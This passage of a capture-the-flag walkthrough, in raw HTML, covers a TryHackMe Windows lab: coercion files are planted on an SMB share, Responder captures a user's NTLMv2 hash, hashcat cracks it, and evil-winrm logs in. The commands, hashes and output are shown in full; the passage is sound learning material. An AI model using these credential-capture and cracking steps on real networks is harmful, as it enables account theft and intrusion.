#BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test.pdf<\/span><span style=\"color: #BABED8\"> (OPEN <\/span><span style=\"color: #C3E88D\">AND<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ALLOW<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/zoom-attack-instructions.txt<\/span><span style=\"color: #BABED8\"> (PASTE <\/span><span style=\"color: #C3E88D\">TO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CHAT<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/Autorun.inf<\/span><span style=\"color: #BABED8\"> (BROWSE <\/span><span style=\"color: #C3E88D\">TO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">FOLDER<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/desktop.ini<\/span><span style=\"color: #BABED8\"> (BROWSE <\/span><span style=\"color: #C3E88D\">TO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">FOLDER<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Generation<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Complete.<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We will try uploading all these files now to the SMB share and hope to capture the NTLM hash of a user.<\/p>\n\n\n\n<p>Soon enough, we receive the hash for the user <strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">AUTOMATE<\/mark><\/strong>!<\/p>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset]\n\u2514\u2500$  sudo responder -I tun0 -v\n                                         __\n  .----.-----.-----.-----.-----.-----.--|  |.-----.----.\n  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|\n  |__| |_____|_____|   __|_____|__|__|_____||_____|__|\n                   |__|\n\n           NBT-NS, LLMNR &amp; MDNS Responder 3.1.4.0\n\n  To support this project:\n  Github -&gt; https:\/\/github.com\/sponsors\/lgandx\n  Paypal  -&gt; https:\/\/paypal.me\/PythonResponder\n\n  Author: Laurent Gaffie (laurent.gaffie@gmail.com)\n  To kill this script hit CTRL-C\n\n\n[+] Poisoners:\n    LLMNR                      [ON]\n    NBT-NS                     [ON]\n    MDNS                       [ON]\n    DNS                        [ON]\n    DHCP                       [OFF]\n\n[+] Servers:\n    HTTP server                [ON]\n    HTTPS server               [ON]\n    WPAD proxy                 [OFF]\n    Auth proxy                 [OFF]\n    SMB server                 [ON]\n    Kerberos server            [ON]\n    SQL server                 [ON]\n    FTP server                 [ON]\n\n..&lt;SNIPPED&gt;..\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">sudo<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">responder<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-I<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">tun0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-v<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                                         <\/span><span style=\"color: #FFCB6B\">__<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #82AAFF\">.<\/span><span style=\"color: #BABED8\">----<\/span><span style=\"color: #82AAFF\">.<\/span><span style=\"color: #BABED8\">-----<\/span><span style=\"color: #82AAFF\">.<\/span><span style=\"color: #BABED8\">-----<\/span><span style=\"color: #82AAFF\">.<\/span><span style=\"color: #BABED8\">-----<\/span><span style=\"color: #82AAFF\">.<\/span><span style=\"color: #BABED8\">-----<\/span><span style=\"color: #82AAFF\">.<\/span><span style=\"color: #BABED8\">-----<\/span><span style=\"color: #82AAFF\">.<\/span><span style=\"color: #BABED8\">--<\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #82AAFF\">.<\/span><span style=\"color: #BABED8\">-----<\/span><span style=\"color: #82AAFF\">.<\/span><span style=\"color: #BABED8\">----<\/span><span style=\"color: #82AAFF\">.<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">-__<\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">__<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">--<\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">     <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">||<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">-__<\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">__<\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_____<\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_____<\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">__<\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_____<\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">__<\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">__<\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_____<\/span><span style=\"color: #89DDFF\">||<\/span><span style=\"color: #FFCB6B\">_____<\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">__<\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                   <\/span><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">__<\/span><span style=\"color: #89DDFF\">|<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">           <\/span><span style=\"color: #FFCB6B\">NBT-NS,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">LLMNR<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&amp;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">MDNS<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Responder<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3.1<\/span><span style=\"color: #C3E88D\">.4.0<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">To<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">support<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">this<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">project:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">Github<\/span><span style=\"color: #BABED8\"> -<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">https:\/\/github.com\/sponsors\/lgandx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">Paypal<\/span><span style=\"color: #BABED8\">  -<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">https:\/\/paypal.me\/PythonResponder<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">Author:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Laurent<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Gaffie<\/span><span style=\"color: #BABED8\"> (laurent.gaffie@gmail.com)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">To<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">kill<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">this<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">script<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">hit<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CTRL-C<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Poisoners:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">LLMNR<\/span><span style=\"color: #BABED8\">                      [ON]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">NBT-NS<\/span><span style=\"color: #BABED8\">                     [ON]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">MDNS<\/span><span style=\"color: #BABED8\">                       [ON]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">DNS<\/span><span style=\"color: #BABED8\">                        [ON]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">DHCP<\/span><span style=\"color: #BABED8\">                       [OFF]<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Servers:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">HTTP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">server<\/span><span style=\"color: #BABED8\">                [ON]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">HTTPS<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">server<\/span><span style=\"color: #BABED8\">               [ON]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">WPAD<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">proxy<\/span><span style=\"color: #BABED8\">                 [OFF]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">Auth<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">proxy<\/span><span style=\"color: #BABED8\">                 [OFF]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">SMB<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">server<\/span><span style=\"color: #BABED8\">                 [ON]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">Kerberos<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">server<\/span><span style=\"color: #BABED8\">            [ON]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">SQL<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">server<\/span><span style=\"color: #BABED8\">                 [ON]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #FFCB6B\">FTP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">server<\/span><span style=\"color: #BABED8\">                 [ON]<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #82AAFF\">..<\/span><span style=\"color: #BABED8\">&lt;SNIPPED&gt;<\/span><span style=\"color: #82AAFF\">..<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#282A36\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"[+] Listening for events...\n\n[SMB] NTLMv2-SSP Client   : 10.10.52.38\n[SMB] NTLMv2-SSP Username : THM\\AUTOMATE\n[SMB] NTLMv2-SSP Hash     : AUTOMATE::THM:ac22ace6c33d1e30:18D3C04491D0F4AF68DEAA8DE5358079:01010000000000008086039E0B52DA01661F7329F18059CE0000000002000800310057003700330001001E00570049004E002D0046004B004D005600500047004300450031004E00460004003400570049004E002D0046004B004D005600500047004300450031004E0046002E0031005700370033002E004C004F00430041004C000300140031005700370033002E004C004F00430041004C000500140031005700370033002E004C004F00430041004C00070008008086039E0B52DA0106000400020000000800300030000000000000000100000000200000371A1642F741A2F7AEBAF60815161AA471F2A2F89F4A59DF8917C4E7A7F95BCF0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310033002E0031002E003100310032000000000000000000\n\" style=\"color:#F8F8F2;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki dracula\" style=\"background-color: #282A36\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #F8F8F2\">[+] Listening <\/span><span style=\"color: #FF79C6\">for<\/span><span style=\"color: #F8F8F2\"> events...<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">[SMB] NTLMv2-SSP Client   <\/span><span style=\"color: #8BE9FD\">:<\/span><span style=\"color: #F8F8F2\"> 10.10.52.38<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">[SMB] NTLMv2-SSP Username <\/span><span style=\"color: #8BE9FD\">:<\/span><span style=\"color: #F8F8F2\"> THM<\/span><span style=\"color: #FF79C6\">\\A<\/span><span style=\"color: #F8F8F2\">UTOMATE<\/span><\/span>\n<span class=\"line\"><span style=\"color: #F8F8F2\">[SMB] NTLMv2-SSP Hash     <\/span><span style=\"color: #8BE9FD\">:<\/span><span style=\"color: #F8F8F2\"> AUTOMATE::THM:ac22ace6c33d1e30:18D3C04491D0F4AF68DEAA8DE5358079:01010000000000008086039E0B52DA01661F7329F18059CE0000000002000800310057003700330001001E00570049004E002D0046004B004D005600500047004300450031004E00460004003400570049004E002D0046004B004D005600500047004300450031004E0046002E0031005700370033002E004C004F00430041004C000300140031005700370033002E004C004F00430041004C000500140031005700370033002E004C004F00430041004C00070008008086039E0B52DA0106000400020000000800300030000000000000000100000000200000371A1642F741A2F7AEBAF60815161AA471F2A2F89F4A59DF8917C4E7A7F95BCF0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310033002E0031002E003100310032000000000000000000<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can use <strong><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">hashcat <\/mark><\/em><\/strong>to crack this hash now by running the below command.<\/p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset]\n\u2514\u2500$ hashcat hash \/usr\/share\/wordlists\/rockyou.txt \nhashcat (v6.2.6) starting in autodetect mode\n\n..&lt;SNIPPED&gt;..\n\nDictionary cache hit:\n* Filename..: \/usr\/share\/wordlists\/rockyou.txt\n* Passwords.: 14344385\n* Bytes.....: 139921507\n* Keyspace..: 14344385\n\nAUTOMATE::THM:3ff742788e50ecf9:351623092413a92a3b1c585323e9af40:01010000000000008086039e0b52da01b200879a6cda0dcd0000000002000800310057003700330001001e00570049004e002d0046004b004d005600500047004300450031004e00460004003400570049004e002d0046004b004d005600500047004300450031004e0046002e0031005700370033002e004c004f00430041004c000300140031005700370033002e004c004f00430041004c000500140031005700370033002e004c004f00430041004c00070008008086039e0b52da0106000400020000000800300030000000000000000100000000200000371a1642f741a2f7aebaf60815161aa471f2a2f89f4a59df8917c4e7a7f95bcf0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310033002e0031002e003100310032000000000000000000:PassXXXXXXX\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">hashcat<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">hash<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">\/usr\/share\/wordlists\/rockyou.txt<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">hashcat<\/span><span style=\"color: #BABED8\"> (v6.2.6) starting <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> autodetect mode<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #82AAFF\">..<\/span><span style=\"color: #BABED8\">&lt;SNIPPED&gt;<\/span><span style=\"color: #82AAFF\">..<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Dictionary<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cache<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">hit:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\"> Filename..: \/usr\/share\/wordlists\/rockyou.txt<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\"> Passwords.: 14344385<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\"> Bytes.....: 139921507<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\"> Keyspace..: 14344385<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">AUTOMATE::THM:3ff742788e50ecf9:351623092413a92a3b1c585323e9af40:01010000000000008086039e0b52da01b200879a6cda0dcd0000000002000800310057003700330001001e00570049004e002d0046004b004d005600500047004300450031004e00460004003400570049004e002d0046004b004d005600500047004300450031004e0046002e0031005700370033002e004c004f00430041004c000300140031005700370033002e004c004f00430041004c000500140031005700370033002e004c004f00430041004c00070008008086039e0b52da0106000400020000000800300030000000000000000100000000200000371a1642f741a2f7aebaf60815161aa471f2a2f89f4a59df8917c4e7a7f95bcf0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310033002e0031002e003100310032000000000000000000:PassXXXXXXX<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>After getting the password, we can log in to the machine using <strong><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">evil-winrm<\/mark><\/em><\/strong> and get the user flag.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset]\n\u2514\u2500$ evil-winrm -i 10.10.52.38 -u AUTOMATE\nEnter Password: \n                                        \nEvil-WinRM shell v3.5\n                                        \nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\n                                        \nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n                                        \nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS 